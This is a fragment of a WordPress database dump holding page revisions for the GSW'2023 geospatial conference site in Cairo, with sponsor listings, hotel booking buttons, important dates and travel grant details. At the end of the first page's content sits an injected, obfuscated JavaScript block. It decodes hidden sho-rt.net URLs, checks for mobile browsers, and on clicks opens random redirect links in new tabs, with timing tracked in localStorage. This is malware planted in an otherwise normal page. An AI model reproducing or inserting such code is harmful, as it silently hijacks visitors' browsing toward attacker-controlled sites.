link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 07:59:22','2023-06-01 07:59:22','',3066,'https://gsw2023.com/?p=4593',0,'revision','',0),
(4594,1,'2023-06-01 08:02:32','2023-06-01 08:02:32','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685606500711{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"www.vint.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" 